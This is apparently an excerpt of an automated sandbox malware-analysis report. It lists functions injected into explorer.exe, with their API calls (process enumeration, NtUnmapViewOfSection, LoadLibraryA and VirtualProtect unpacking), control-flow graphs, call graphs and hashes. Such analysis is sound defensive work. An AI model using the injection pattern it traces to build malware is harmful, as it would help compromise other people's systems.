                                                                                                                                                      • Opcode ID: de614c34dc0f6660967f1b89c6625a10f8d102bc0542707c7f8d1b2a4e55f326
                                                                                                                                                      • Instruction ID: 091be761fd05b5ad0801c2e31ab20b748e51bddd263c0efc64d30e55471bf4b5
                                                                                                                                                      • Opcode Fuzzy Hash: de614c34dc0f6660967f1b89c6625a10f8d102bc0542707c7f8d1b2a4e55f326
                                                                                                                                                      • Instruction Fuzzy Hash: 6401F930910600EBD7147B76EC6AABE3AAAFF457407100228F405C7661DF34DD49DBB2
                                                                                                                                                      Function 001B26C9 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,001B11DD), ref: 001B26DB
                                                                                                                                                      • IsWow64Process.KERNEL32(000000FF,?), ref: 001B26ED
                                                                                                                                                      • IsWow64Process.KERNEL32(00000000,?), ref: 001B2700
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001B2716
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 331459951-0
                                                                                                                                                      • Opcode ID: 81dac3df870039d5ee5a96c910281f9023428c65daa35e4c4844d25c603fd54b
                                                                                                                                                      • Instruction ID: 96e2c338227dec6162ce4e8184530d589f4fc3538647f7fb7eeb4d7da5a0ad19
                                                                                                                                                      • Opcode Fuzzy Hash: 81dac3df870039d5ee5a96c910281f9023428c65daa35e4c4844d25c603fd54b
                                                                                                                                                      • Instruction Fuzzy Hash: C5F0B471842218FF9B10DFA1DD488EEB7BDEF05352B20036AF91093140DB304F4496A5
                                                                                                                                                      Function 001B17DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 001B2A09: GetProcessHeap.KERNEL32(00000008,0000A000,001B10BF), ref: 001B2A0C
                                                                                                                                                        • Part of subcall function 001B2A09: RtlAllocateHeap.NTDLL(00000000), ref: 001B2A13
                                                                                                                                                      • GetLocalTime.KERNEL32(?,00000000), ref: 001B17F3
                                                                                                                                                      • wsprintfW.USER32 ref: 001B181D
                                                                                                                                                      Strings
                                                                                                                                                      • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 001B1817
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                                                                      • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                                                                                                      • API String ID: 377395780-613334611
                                                                                                                                                      • Opcode ID: 54ec78c7dead9fdef3f407b537aedee3a2931bf0b2ab9693ed620dfd459a38e7
                                                                                                                                                      • Instruction ID: 691d6d60fa0180a3d7e115f7b55267089c71dad895bb2071cb6df855c359a07d
                                                                                                                                                      • Opcode Fuzzy Hash: 54ec78c7dead9fdef3f407b537aedee3a2931bf0b2ab9693ed620dfd459a38e7
                                                                                                                                                      • Instruction Fuzzy Hash: 41F03062900128BAC7146BDD9C458FFB2FCEF0CB02B00028AFA51E2180E7785AA0D3B5

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:13%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:20
                                                                                                                                                      Total number of Limit Nodes:3
                                                                                                                                                      execution_graph 912 9db2be 913 9db2c2 912->913 914 9db689 913->914 915 9db4a8 3 API calls 913->915 916 9db458 915->916 893 9db4a8 898 9db4ad 893->898 894 9db595 LoadLibraryA 894->898 896 9db5f0 VirtualProtect VirtualProtect 897 9db67e 896->897 897->897 898->894 898->896 899 9db5e5 898->899 900 9db358 901 9db35a 900->901 902 9db689 901->902 905 9db4a8 901->905 910 9db4ad 905->910 906 9db595 LoadLibraryA 906->910 908 9db5f0 VirtualProtect VirtualProtect 909 9db67e 908->909 909->909 910->906 910->908 911 9db458 910->911

                                                                                                                                                      Callgraph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                      • Disassembly available
                                                                                                                                                      callgraph 0 Function_009D141D 1 Function_009DAB9C 2 Function_009D1E1C 31 Function_009D1838 2->31 3 Function_009D1E9C 4 Function_009D2918 5 Function_009D2D14 5->2 29 Function_009D24B8 5->29 5->31 75 Function_009D18E8 5->75 80 Function_009D1860 5->80 6 Function_009D3394 6->3 16 Function_009D1A88 6->16 6->31 52 Function_009D18D0 6->52 66 Function_009D1EF8 6->66 6->75 6->80 7 Function_009D4817 8 Function_009DB291 9 Function_009D1B10 10 Function_009DAC8D 11 Function_009D1F0C 12 Function_009D188C 12->31 13 Function_009D370C 13->13 13->31 37 Function_009D31AC 13->37 58 Function_009D34C4 13->58 72 Function_009D1C6C 13->72 14 Function_009D5289 15 Function_009D1508 17 Function_009D1405 18 Function_009D2A04 18->4 59 Function_009D27C4 18->59 18->72 19 Function_009D1D04 20 Function_009DB007 21 Function_009DA881 22 Function_009DAD00 23 Function_009D2580 24 Function_009D1F00 25 Function_009D1000 26 Function_009D19BC 27 Function_009D2FBC 36 Function_009D2E2C 27->36 28 Function_009DB2BE 38 Function_009DB4A8 28->38 29->31 68 Function_009D20F4 29->68 29->80 30 Function_009D1938 30->31 30->80 32 Function_009DAAB0 33 Function_009D14B2 34 Function_009D1CAC 35 Function_009D20AC 35->16 36->12 60 Function_009D2DC0 36->60 36->80 37->9 37->31 39 Function_009D25A8 37->39 50 Function_009D1D54 37->50 65 Function_009D26F8 37->65 37->80 78 Function_009DB46A 38->78 39->23 39->52 74 Function_009D2768 39->74 40 Function_009D1D24 41 Function_009D27A0 42 Function_009D1822 43 Function_009D1FDC 43->31 64 Function_009D18F8 43->64 44 Function_009DB2DF 45 Function_009DB358 45->38 46 Function_009D3158 47 Function_009DB15B 48 Function_009D1254 49 Function_009D14D4 51 Function_009DABD7 53 Function_009D4150 54 Function_009DAAD2 55 Function_009D1C4C 56 Function_009DABCF 57 Function_009DB148 58->6 58->16 58->18 58->19 58->26 58->31 58->34 58->40 58->55 63 Function_009D1BF8 58->63 58->72 58->80 60->31 61 Function_009D14F9 62 Function_009D5579 65->23 65->72 79 Function_009D2664 65->79 67 Function_009D1EFA 68->11 68->12 68->26 68->31 68->35 68->43 68->52 68->64 68->80 69 Function_009DAFF6 70 Function_009D1576 71 Function_009D156C 73 Function_009DA8E8 74->41 76 Function_009D3068 76->30 76->31 76->36 76->72 76->80 77 Function_009DADEA 80->72 81 Function_009D1560 82 Function_009DAFE3

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 009D370C Relevance: 1.6, APIs: 1, Instructions: 75nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 113 9d370c-9d371c call 9d1c6c 116 9d37b0-9d37b5 113->116 117 9d3722-9d3754 call 9d1838 113->117 121 9d3785-9d37aa NtUnmapViewOfSection 117->121 122 9d3756-9d375b call 9d1838 117->122 126 9d37bc-9d37cb call 9d34c4 121->126 127 9d37ac-9d37ae 121->127 124 9d3760-9d3779 122->124 124->121 132 9d37cd-9d37d0 call 9d370c 126->132 133 9d37d5-9d37de 126->133 127->116 129 9d37b6-9d37bb call 9d31ac 127->129 129->126 132->133
                                                                                                                                                      APIs
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL ref: 009D378C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.2523374626.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_9d1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                                      • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                                                      • Instruction ID: 48e717ff2dba5a23c965fff49e0793bde15dbb3522983da262fd758735ccf20d
                                                                                                                                                      • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                                                      • Instruction Fuzzy Hash: 0B11B274651D095BFB58FBB8989D37533E5FB58312F54C02BE815C73A2EE398A818701
                                                                                                                                                      Function 009D34C4 Relevance: 10.7, APIs: 7, Instructions: 195processCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 009D1BF8: OpenFileMappingA.KERNEL32 ref: 009D1C0F
                                                                                                                                                        • Part of subcall function 009D1BF8: MapViewOfFile.KERNELBASE ref: 009D1C2E
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 009D35B7
                                                                                                                                                      • Process32First.KERNEL32 ref: 009D35DA
                                                                                                                                                      • CharLowerA.USER32 ref: 009D35EE
                                                                                                                                                      • Process32Next.KERNEL32 ref: 009D36CD
                                                                                                                                                      • CloseHandle.KERNELBASE ref: 009D36DE
                                                                                                                                                      • SysFreeMap.PGOCR ref: 009D36F7
                                                                                                                                                      • SleepEx.KERNELBASE ref: 009D3701
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.2523374626.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_9d1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileProcess32$CharCloseCreateFirstFreeHandleLowerMappingNextOpenSleepSnapshotToolhelp32View
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2386764625-0
                                                                                                                                                      • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                                                      • Instruction ID: a6b2ef14d9145296b1d160cd7cfe8a06c8c5cee9ba8ba4aea62e4ad73cc34212
                                                                                                                                                      • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                                                      • Instruction Fuzzy Hash: C751C831358A085FDB19FF68D8997AA73D5EB94301F44C61AE44BC33A1DF38DA058782
                                                                                                                                                      Function 009DB4A8 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 54 9db4a8-9db4ab 55 9db4b5-9db4b9 54->55 56 9db4bb-9db4c3 55->56 57 9db4c5 55->57 56->57 58 9db4ad-9db4b3 57->58 59 9db4c7 57->59 58->55 60 9db4ca-9db4d1 59->60 62 9db4dd 60->62 63 9db4d3-9db4db 60->63 62->60 64 9db4df-9db4e2 62->64 63->62 65 9db4e4-9db4f2 64->65 66 9db4f7-9db504 64->66 67 9db52e-9db549 65->67 68 9db4f4-9db4f5 65->68 80 9db51e-9db52c call 9db46a 66->80 81 9db506-9db508 66->81 69 9db57a-9db57d 67->69 68->66 71 9db57f-9db580 69->71 72 9db582-9db589 69->72 73 9db561-9db565 71->73 74 9db58f-9db593 72->74 78 9db54b-9db54e 73->78 79 9db567-9db56a 73->79 76 9db595-9db5ae LoadLibraryA 74->76 77 9db5f0-9db5f9 74->77 84 9db5af-9db5b6 76->84 82 9db5fc-9db605 77->82 78->72 85 9db550 78->85 79->72 86 9db56c-9db570 79->86 80->55 87 9db50b-9db512 81->87 90 9db62a-9db67a VirtualProtect * 2 82->90 91 9db607-9db609 82->91 84->74 93 9db5b8 84->93 88 9db551-9db555 85->88 86->88 89 9db572-9db579 86->89 101 9db51c 87->101 102 9db514-9db51a 87->102 88->73 100 9db557-9db559 88->100 89->69 97 9db67e-9db683 90->97 95 9db61c-9db628 91->95 96 9db60b-9db61a 91->96 98 9db5ba-9db5c2 93->98 99 9db5c4-9db5cc 93->99 95->96 96->82 97->97 103 9db685-9db694 97->103 104 9db5ce-9db5da 98->104 99->104 100->73 105 9db55b-9db55f 100->105 101->80 101->87 102->101 108 9db5dc-9db5e3 104->108 109 9db5e5-9db5ef 104->109 105->73 105->79 108->84
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 009DB5A7
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 009DB651
                                                                                                                                                      • VirtualProtect.KERNELBASE ref: 009DB66F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.2523374626.00000000009DA000.00000040.80000000.00040000.00000000.sdmp, Offset: 009DA000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_9da000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 895956442-0
                                                                                                                                                      • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                                                      • Instruction ID: 64797c5a4151a12b08f73e8cc32d38b3d47860e6e246d71445333e384de12c06
                                                                                                                                                      • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                                                      • Instruction Fuzzy Hash: FD517B327D491E8BCB24AB38ACC43F4B7C1F759325B594A2BE49AC3395D758C8468381
                                                                                                                                                      Function 009D1BF8 Relevance: 3.0, APIs: 2, Instructions: 40fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 110 9d1bf8-9d1c18 OpenFileMappingA 111 9d1c3b-9d1c48 110->111 112 9d1c1a-9d1c38 MapViewOfFile 110->112 112->111
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.2523374626.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_9d1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$MappingOpenView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3439327939-0
                                                                                                                                                      • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                                                      • Instruction ID: 7c6f8af0dc3895e2eca63536ef45dac92d7060d84882ed0a7e309321eecd9a8b
                                                                                                                                                      • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                                                      • Instruction Fuzzy Hash: F8F01234318F4D4FAB45EF7C9C9C135B7E1EBA8202744857A985AC6265EF34C8458711